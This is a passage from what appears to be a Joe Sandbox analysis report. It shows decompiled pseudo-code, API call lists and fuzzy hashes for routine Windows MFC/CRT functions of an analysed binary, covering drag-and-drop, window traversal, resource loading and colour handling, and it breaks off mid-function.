                  				void* __esi;
                  				void* __ebp;
                  				signed int _t18;
                  				void* _t31;
                  				intOrPtr _t32;
                  				intOrPtr _t38;
                  				void* _t39;
                  				intOrPtr* _t40;
                  				intOrPtr _t41;
                  				intOrPtr _t44;
                  				signed int _t48;
                  				void* _t51;
                  
                  				_t51 = __eflags;
                  				_t38 = __edx;
                  				_t33 = __ecx;
                  				_t46 = _t48;
                  				_t18 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t18 ^ _t48;
                  				_t31 = _a4;
                  				_push(_t39);
                  				E0040E20E(_t31, _t33, SetActiveWindow( *(__ecx + 0x20)));
                  				_v536 = DragQueryFileW(_t31, 0xffffffff, 0, 0);
                  				_t24 = E0042083D(_t31, _t39, DragQueryFileW, _t51);
                  				_v532 = _v532 & 0x00000000;
                  				_t40 =  *((intOrPtr*)(_t24 + 4));
                  				if(_v536 > 0) {
                  					do {
                  						DragQueryFileW(_t31, _v532,  &_v528, 0x104);
                  						 *((intOrPtr*)( *_t40 + 0x88))( &_v528);
                  						_v532 = _v532 + 1;
                  						_t24 = _v532;
                  					} while (_v532 < _v536);
                  				}
                  				DragFinish(_t31);
                  				_pop(_t41);
                  				_pop(_t44);
                  				_pop(_t32);
                  				return E00427DFF(_t24, _t32, _v8 ^ _t46, _t38, _t41, _t44);
                  			}






















                  APIs
                  • SetActiveWindow.USER32(?), ref: 004166F9
                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00416712
                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00416745
                  • DragFinish.SHELL32(?), ref: 0041676D
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Drag$FileQuery$ActiveFinishWindow
                  • String ID:
                  • API String ID: 892977027-0
                  • Opcode ID: a5cf6b076f4144340afdfd0d45fdcb9b6a611b85cf84661871ea831614a1f8ae
                  • Instruction ID: e8fc85845f8c1f4b30ec2a3a8a0d79ecfce16764fac14ddc6333a10d0db89026
                  • Opcode Fuzzy Hash: a5cf6b076f4144340afdfd0d45fdcb9b6a611b85cf84661871ea831614a1f8ae
                  • Instruction Fuzzy Hash: 6E115171A40218ABCB10EB64DD89BEEB7B8FB54310F1145EAF529A7191CA749D80CF64
                  Uniqueness

                  Uniqueness Score: 0.58%

                  C-Code - Quality: 94%
                  			E00427034(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
                  				struct tagPOINT _v12;
                  				void* __edi;
                  				struct tagPOINT* _t8;
                  				struct HWND__* _t9;
                  				int _t14;
                  				long _t19;
                  				void* _t20;
                  				struct HWND__* _t22;
                  				struct HWND__* _t23;
                  				struct HWND__* _t26;
                  
                  				_t20 = __edx;
                  				_t8 = _a8;
                  				_v12.x = _t8->x;
                  				_t19 = _t8->y;
                  				_push(_t19);
                  				_v12.y = _t19;
                  				_t9 = WindowFromPoint( *_t8);
                  				_t26 = _t9;
                  				if(_t26 != 0) {
                  					_t22 = GetParent(_t26);
                  					if(_t22 == 0 || E00420A0C(__ebx, _t20, _t22, _t22, 2) == 0) {
                  						ScreenToClient(_t26,  &_v12);
                  						_t23 = E00420AB2(_t26, _v12.x, _v12.y);
                  						if(_t23 == 0) {
                  							L6:
                  							_t9 = _t26;
                  						} else {
                  							_t14 = IsWindowEnabled(_t23);
                  							_t9 = _t23;
                  							if(_t14 != 0) {
                  								goto L6;
                  							}
                  						}
                  					} else {
                  						_t9 = _t22;
                  					}
                  				}
                  				return _t9;
                  			}














                  APIs
                  • WindowFromPoint.USER32(?,?), ref: 0042704D
                  • GetParent.USER32(00000000), ref: 0042705B
                  • ScreenToClient.USER32(00000000,?), ref: 0042707C
                  • IsWindowEnabled.USER32(00000000), ref: 00427095
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$ClientEnabledFromParentPointScreen
                  • String ID:
                  • API String ID: 1871804413-0
                  • Opcode ID: b94c142eb55133eaace89e579fe40d321248e6ca5a2608be5367493918d0daee
                  • Instruction ID: 502f2b470de6b6ce7da8eb33fd0840b90473116ee06410ed5761847683583fbf
                  • Opcode Fuzzy Hash: b94c142eb55133eaace89e579fe40d321248e6ca5a2608be5367493918d0daee
                  • Instruction Fuzzy Hash: 5501D436704620BF87129B58EC08D6FBBB9EFC5740B54006AF900D3310EB39DD058759
                  Uniqueness

                  Uniqueness Score: 0.47%

                  C-Code - Quality: 77%
                  			E0040ED9C(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t16;
                  				struct HWND__* _t18;
                  				struct HWND__* _t20;
                  				void* _t22;
                  				void* _t23;
                  				void* _t24;
                  				struct HWND__* _t25;
                  
                  				_t23 = __ecx;
                  				_t22 = __ebx;
                  				_t24 = GetTopWindow;
                  				_t16 = GetTopWindow(_a4);
                  				while(1) {
                  					_t25 = _t16;
                  					if(_t25 == 0) {
                  						break;
                  					}
                  					__eflags = _a24;
                  					if(__eflags == 0) {
                  						SendMessageW(_t25, _a8, _a12, _a16);
                  					} else {
                  						_t20 = E0040E23A(_t22, _t23, _t24, _t25, __eflags, _t25);
                  						__eflags = _t20;
                  						if(__eflags != 0) {
                  							_push(_a16);
                  							_push(_a12);
                  							_push(_a8);
                  							_push( *((intOrPtr*)(_t20 + 0x20)));
                  							_push(_t20);
                  							E0040EAB1(_t22, _t24, _t25, __eflags);
                  						}
                  					}
                  					__eflags = _a20;
                  					if(_a20 != 0) {
                  						_t18 = GetTopWindow(_t25);
                  						__eflags = _t18;
                  						if(_t18 != 0) {
                  							E0040ED9C(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                  						}
                  					}
                  					_t16 = GetWindow(_t25, 2);
                  				}
                  				return _t16;
                  			}














                  APIs
                  • GetTopWindow.USER32(004089E5), ref: 0040EDAC
                  • GetTopWindow.USER32(00000000), ref: 0040EDEB
                  • GetWindow.USER32(00000000,00000002), ref: 0040EE09
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window
                  • String ID:
                  • API String ID: 2353593579-0
                  • Opcode ID: ef9b084704a80eb7edb457014c17e07389a504682be50e31a57e7e0b16d9c132
                  • Instruction ID: f063a54ea87c3ee12856bf1bbb26572acce20518b4a8890f1bda63ba8ec4a677
                  • Opcode Fuzzy Hash: ef9b084704a80eb7edb457014c17e07389a504682be50e31a57e7e0b16d9c132
                  • Instruction Fuzzy Hash: F201ED3200111ABBCF226F52DC09EDF3A2AEF58364F044426FA14651A1C739C971EBEA
                  Uniqueness

                  Uniqueness Score: 3.15%

                  C-Code - Quality: 91%
                  			E0040E55A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t9;
                  				struct HWND__* _t10;
                  				void* _t14;
                  				void* _t15;
                  				struct HWND__* _t16;
                  				struct HWND__* _t17;
                  
                  				_t14 = __ecx;
                  				_t13 = __ebx;
                  				_t9 = GetDlgItem(_a4, _a8);
                  				_t15 = GetTopWindow;
                  				_t16 = _t9;
                  				if(_t16 == 0) {
                  					L6:
                  					_t10 = GetTopWindow(_a4);
                  					while(1) {
                  						_t17 = _t10;
                  						__eflags = _t17;
                  						if(_t17 == 0) {
                  							goto L10;
                  						}
                  						_t10 = E0040E55A(_t13, _t14, _t17, _a8, _a12);
                  						__eflags = _t10;
                  						if(_t10 == 0) {
                  							_t10 = GetWindow(_t17, 2);
                  							continue;
                  						}
                  						goto L10;
                  					}
                  				} else {
                  					if(GetTopWindow(_t16) == 0) {
                  						L3:
                  						_push(_t16);
                  						if(_a12 == 0) {
                  							return E0040E20E(_t13, _t14);
                  						}
                  						_t10 = E0040E23A(_t13, _t14, _t15, _t16, __eflags);
                  						__eflags = _t10;
                  						if(_t10 == 0) {
                  							goto L6;
                  						}
                  					} else {
                  						_t10 = E0040E55A(__ebx, _t14, _t16, _a8, _a12);
                  						if(_t10 == 0) {
                  							goto L3;
                  						}
                  					}
                  				}
                  				L10:
                  				return _t10;
                  			}












                  APIs
                  • GetDlgItem.USER32(?,?), ref: 0040E567
                  • GetTopWindow.USER32(00000000), ref: 0040E57A
                    • Part of subcall function 0040E55A: GetWindow.USER32(00000000,00000002), ref: 0040E5C1
                  • GetTopWindow.USER32(?), ref: 0040E5AA
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Item
                  • String ID:
                  • API String ID: 369458955-0
                  • Opcode ID: 03f261cb7e1c27f1ca65299cef57b8ad1bee42e7a860e11b943b9d1485bb4500
                  • Instruction ID: dab8bcbfec70b838be1bc8d0ed6771cf35bb7575be5b57fc64af9fee46ed669e
                  • Opcode Fuzzy Hash: 03f261cb7e1c27f1ca65299cef57b8ad1bee42e7a860e11b943b9d1485bb4500
                  • Instruction Fuzzy Hash: B60121320016157BCB226BA38C15E9F3AA9AF54368F054C36FD04B5291FB39CA719A99
                  Uniqueness

                  Uniqueness Score: 2.84%

                  C-Code - Quality: 100%
                  			E00431FE1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				intOrPtr _t25;
                  				void* _t26;
                  				void* _t28;
                  
                  				_t25 = _a16;
                  				if(_t25 == 0x65 || _t25 == 0x45) {
                  					_t26 = E004318D2(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                  					goto L9;
                  				} else {
                  					_t34 = _t25 - 0x66;
                  					if(_t25 != 0x66) {
                  						__eflags = _t25 - 0x61;
                  						if(_t25 == 0x61) {
                  							L7:
                  							_t26 = E004319C2(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                  						} else {
                  							__eflags = _t25 - 0x41;
                  							if(__eflags == 0) {
                  								goto L7;
                  							} else {
                  								_t26 = E00431EE7(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                  							}
                  						}
                  						L9:
                  						return _t26;
                  					} else {
                  						return E00431E2C(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                  					}
                  				}
                  			}







                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction ID: 480a460c25ce70ccdb1b851d193dca5c4b5a2c3da5b3a1c0199ccf3d908bd187
                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction Fuzzy Hash: A7113D7200014ABBCF2A5E85CD418EE3F72BB1C354F599416FB2859131C27AC9B6EB85
                  Uniqueness

                  Uniqueness Score: 1.11%

                  C-Code - Quality: 88%
                  			E0041155E(intOrPtr __ecx, WCHAR* _a4) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t7;
                  				struct HRSRC__* _t10;
                  				void* _t13;
                  				void* _t18;
                  				void* _t20;
                  				void* _t21;
                  				struct HINSTANCE__* _t23;
                  
                  				_push(__ecx);
                  				_push(_t20);
                  				_t13 = 0;
                  				_t18 = 0;
                  				_v8 = __ecx;
                  				_t24 = _a4;
                  				if(_a4 == 0) {
                  					L4:
                  					_t21 = E004110D6(_v8, _t18);
                  					if(_t18 != 0 && _t13 != 0) {
                  						FreeResource(_t13);
                  					}
                  					_t7 = _t21;
                  				} else {
                  					_t23 =  *(E0042083D(0, 0, _t20, _t24) + 0xc);
                  					_t10 = FindResourceW(_t23, _a4, 0xf0);
                  					if(_t10 == 0) {
                  						goto L4;
                  					} else {
                  						_t7 = LoadResource(_t23, _t10);
                  						_t13 = _t7;
                  						if(_t13 != 0) {
                  							_t18 = LockResource(_t13);
                  							goto L4;
                  						}
                  					}
                  				}
                  				return _t7;
                  			}
















                  APIs
                  • FindResourceW.KERNEL32(?,?,000000F0), ref: 00411584
                  • LoadResource.KERNEL32(?,00000000), ref: 00411590
                  • LockResource.KERNEL32(00000000), ref: 0041159D
                  • FreeResource.KERNEL32(00000000), ref: 004115B9
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 3dc3dfd1e8df1ceea7063c1c51193e157d3b00cde397256258ea7c84e2ab7d3e
                  • Instruction ID: 5d1ee5ff1e7846fe990d0a7bc3f704cc9595d8b5920c94905c43643aa6bbd954
                  • Opcode Fuzzy Hash: 3dc3dfd1e8df1ceea7063c1c51193e157d3b00cde397256258ea7c84e2ab7d3e
                  • Instruction Fuzzy Hash: 2AF0C872641211BB9B105FE6AC88D9BB6AEAFC4350708407BFF0693321DE76DE41866D
                  Uniqueness

                  Uniqueness Score: 0.08%

                  C-Code - Quality: 100%
                  			E0041A572(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                  				char _v16;
                  				int _t12;
                  				int _t16;
                  				int _t18;
                  				intOrPtr _t19;
                  				void* _t24;
                  				intOrPtr* _t27;
                  
                  				_t19 = _a4;
                  				_t27 = __ecx;
                  				E00422F7B(__ecx, _t19, _a8);
                  				_t12 = E00411D59(__ecx);
                  				if((_t12 & 0x00000100) != 0) {
                  					_t12 = IsZoomed(GetParent( *(__ecx + 0x20)));
                  					if(_t12 == 0) {
                  						 *((intOrPtr*)( *_t27 + 0x118))(0x407, 0,  &_v16, _t24);
                  						_t16 = GetSystemMetrics(5);
                  						_t18 = GetSystemMetrics(2);
                  						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - _t16 + _t16 - _v16 - _t18;
                  						return _t18;
                  					}
                  				}
                  				return _t12;
                  			}











                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetParent.USER32(?), ref: 0041A59B
                  • IsZoomed.USER32(00000000), ref: 0041A5A2
                  • GetSystemMetrics.USER32(00000005), ref: 0041A5CA
                  • GetSystemMetrics.USER32(00000002), ref: 0041A5D8
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsSystem$LongParentWindowZoomed
                  • String ID:
                  • API String ID: 3909876373-0
                  • Opcode ID: faaa4cde9a5ef9ee03d55ec9688de346d7d87ffdd55fc2758e838e75c0f64098
                  • Instruction ID: 9575901db201dedaf485c9c3866215073a130650604f3e258b6ccb39a7ec58f1
                  • Opcode Fuzzy Hash: faaa4cde9a5ef9ee03d55ec9688de346d7d87ffdd55fc2758e838e75c0f64098
                  • Instruction Fuzzy Hash: A801D6327001107BDB106BB9DC4EB9ABBB8EF44754F014125FB45EB291EA74AC10CBA5
                  Uniqueness

                  Uniqueness Score: 1.40%

                  C-Code - Quality: 100%
                  			E0040C767(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
                  				long _v12;
                  				void _v16;
                  				intOrPtr _t12;
                  				long _t16;
                  				void* _t21;
                  				void* _t22;
                  				void* _t23;
                  
                  				if(_a4 == 0 || _a16 == 0) {
                  					L10:
                  					return 0;
                  				} else {
                  					_t12 = _a12;
                  					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E00420A0C(_t21, _t22, _t23, _a8, _t12) == 0) {
                  						goto L10;
                  					} else {
                  						GetObjectW(_a16, 0xc,  &_v16);
                  						SetBkColor(_a4, _v12);
                  						_t16 = _a20;
                  						if(_t16 == 0xffffffff) {
                  							_t16 = GetSysColor(8);
                  						}
                  						SetTextColor(_a4, _t16);
                  						return 1;
                  					}
                  				}
                  			}











                  APIs
                  • GetObjectW.GDI32(00000000,0000000C,?), ref: 0040C7A7
                  • SetBkColor.GDI32(00000000,00000000), ref: 0040C7B3
                  • GetSysColor.USER32(00000008), ref: 0040C7C3
                  • SetTextColor.GDI32(00000000,?), ref: 0040C7CD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Color$ObjectText
                  • String ID:
                  • API String ID: 829078354-0
                  • Opcode ID: 44bb407b157c777e29b2fd60ab9644da379b406887b12a8ad4251438dfba1bba
                  • Instruction ID: 8d542212d64176848ff7a4e1bf7f81d72017eef1945501ed0f49d49856de4143
                  • Opcode Fuzzy Hash: 44bb407b157c777e29b2fd60ab9644da379b406887b12a8ad4251438dfba1bba
                  • Instruction Fuzzy Hash: 6F012C3118010AEBDB215F64DD89AAB3BB6EB04315F504633F912E61E0D734C860DF9A
                  Uniqueness

                  Uniqueness Score: 0.37%

                  C-Code - Quality: 88%
                  			E0040E7C5(void* __ecx) {
                  				void* __ebx;
                  				void* __edi;
                  				signed int _t5;
                  				void* _t15;
                  				void* _t18;
                  
                  				_t15 = __ecx;
                  				if((E00411D59(__ecx) & 0x40000000) != 0) {
                  					L6:
                  					_t5 = E0040E168(_t15, _t15, _t18, __eflags);
                  					asm("sbb eax, eax");
                  					return  ~( ~_t5);
                  				}
                  				_t18 = E0040CC4F();
                  				if(_t18 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                  					goto L6;
                  				} else {
                  					SendMessageW( *(_t18 + 0x20), 0x111, 0xe146, 0);
                  					return 1;
                  				}
                  			}









                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetKeyState.USER32(00000010), ref: 0040E7EB
                  • GetKeyState.USER32(00000011), ref: 0040E7F4
                  • GetKeyState.USER32(00000012), ref: 0040E7FD
                  • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 0040E813
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: State$LongMessageSendWindow
                  • String ID:
                  • API String ID: 1063413437-0
                  • Opcode ID: b14e449ed1ac78b9afd043711f071687e1a71c384ee17283a8b7ebd64535a622
                  • Instruction ID: 639cc1c9fc91c349acb62a99410e12bf1356db3b5280d1427a52c6ec7a751173
                  • Opcode Fuzzy Hash: b14e449ed1ac78b9afd043711f071687e1a71c384ee17283a8b7ebd64535a622
                  • Instruction Fuzzy Hash: B4F0E93778024B65EA1433735D41FA6051D4FD1B94F00887BBB41FB1D2CEB9C8225278
                  Uniqueness

                  Uniqueness Score: 0.22%

                  C-Code - Quality: 100%
                  			E0041EDAB() {
                  				intOrPtr _t16;
                  				struct HWND__* _t19;
                  				intOrPtr _t23;
                  				intOrPtr* _t28;
                  				void* _t29;
                  
                  				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                  				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                  				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                  					E00411E6E(_t23, 1);
                  				}
                  				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                  					EnableWindow( *(_t29 - 0x14), 1);
                  				}
                  				if( *(_t29 - 0x14) != 0) {
                  					_t19 = GetActiveWindow();
                  					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                  					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                  						SetActiveWindow( *(_t29 - 0x14));
                  					}
                  				}
                  				 *((intOrPtr*)( *_t28 + 0x60))();
                  				E0041E7F4(_t23, _t28, 0, _t28, _t34);
                  				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                  					FreeResource( *(_t29 - 0x18));
                  				}
                  				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                  				return E00429303(_t16);
                  			}









                  APIs
                  • EnableWindow.USER32(?,00000001), ref: 0041EDCB
                  • GetActiveWindow.USER32 ref: 0041EDD6
                  • SetActiveWindow.USER32(?), ref: 0041EDE4
                  • FreeResource.KERNEL32(?,?,00000024,004089A8,A6E2BCA1), ref: 0041EE00
                    • Part of subcall function 00411E6E: EnableWindow.USER32(?,004089A8), ref: 00411E7F
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$ActiveEnable$FreeResource
                  • String ID:
                  • API String ID: 253586258-0
                  • Opcode ID: c5dfa83998e512c3ae3c0afcd2ddafaa279c748f79a69e55e46fa9fa3313f848
                  • Instruction ID: 5c12bbb04d1fb0c27aff0666e5c059b09eba9b74898f31bf398d5a6be09069d2
                  • Opcode Fuzzy Hash: c5dfa83998e512c3ae3c0afcd2ddafaa279c748f79a69e55e46fa9fa3313f848
                  • Instruction Fuzzy Hash: A7F04F34A00615CBCF21EFA6D8495EEB7B1BF48701F60002AF842726A0CB3A5D80CF5A
                  Uniqueness

                  Uniqueness Score: 0.33%

                  C-Code - Quality: 90%
                  			E0042FF8E(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                  				signed int _t13;
                  				intOrPtr _t28;
                  				void* _t29;
                  				void* _t30;
                  
                  				_t30 = __eflags;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ebx;
                  				_push(0xc);
                  				_push(0x447ea8);
                  				E00429338(__ebx, __edi, __esi);
                  				_t28 = E0042C35A(__ebx, __edx, __edi, _t30);
                  				_t13 =  *0x44ccb4; // 0xfffffffe
                  				if(( *(_t28 + 0x70) & _t13) == 0) {
                  					L6:
                  					E0042EACE(_t22, 0xc);
                  					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                  					_t8 = _t28 + 0x6c; // 0x6c
                  					_t26 =  *0x44cd98; // 0x44ccc0
                  					 *((intOrPtr*)(_t29 - 0x1c)) = E0042FF50(_t8, _t26);
                  					 *(_t29 - 4) = 0xfffffffe;
                  					E0042FFF8();
                  				} else {
                  					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                  					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                  						goto L6;
                  					} else {
                  						_t28 =  *((intOrPtr*)(E0042C35A(_t22, __edx, _t26, _t32) + 0x6c));
                  					}
                  				}
                  				if(_t28 == 0) {
                  					E0042AEA5(_t25, _t26, 0x20);
                  				}
                  				return E0042937D(_t28);
                  			}








                  APIs
                  • __getptd.LIBCMT ref: 0042FF9A
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __getptd.LIBCMT ref: 0042FFB1
                  • __amsg_exit.LIBCMT ref: 0042FFBF
                  • __lock.LIBCMT ref: 0042FFCF
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: e1ecb3947682229d40f281b1ed529bcad6822fc2fbce17ebfb16c39304c082ec
                  • Instruction ID: 8321333d5718c6a74650dd4cb1a3f6632f3304fd945d83625efb1a9cd81b86e1
                  • Opcode Fuzzy Hash: e1ecb3947682229d40f281b1ed529bcad6822fc2fbce17ebfb16c39304c082ec
                  • Instruction Fuzzy Hash: CBF0C232B407308BD320FB66A50275D73B06F45718FD6453FE815572C2DB3C58068A9D
                  Uniqueness

                  Uniqueness Score: 0.07%

                  C-Code - Quality: 71%
                  			E00402D00(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, long _a4, signed int _a8, intOrPtr _a12, char _a16, intOrPtr _a20, signed int _a24) {
                  				BITMAPINFO* _v8;
                  				char _v12;
                  				struct HBITMAP__* _v16;
                  				signed int _v20;
                  				struct HDC__* _v24;
                  				struct HDC__* _v28;
                  				struct HDC__* _v32;
                  				intOrPtr _v36;
                  				void** _v40;
                  				void** _v44;
                  				signed int _t65;
                  				struct HDC__* _t80;
                  				intOrPtr _t89;
                  				intOrPtr* _t111;
                  				intOrPtr _t119;
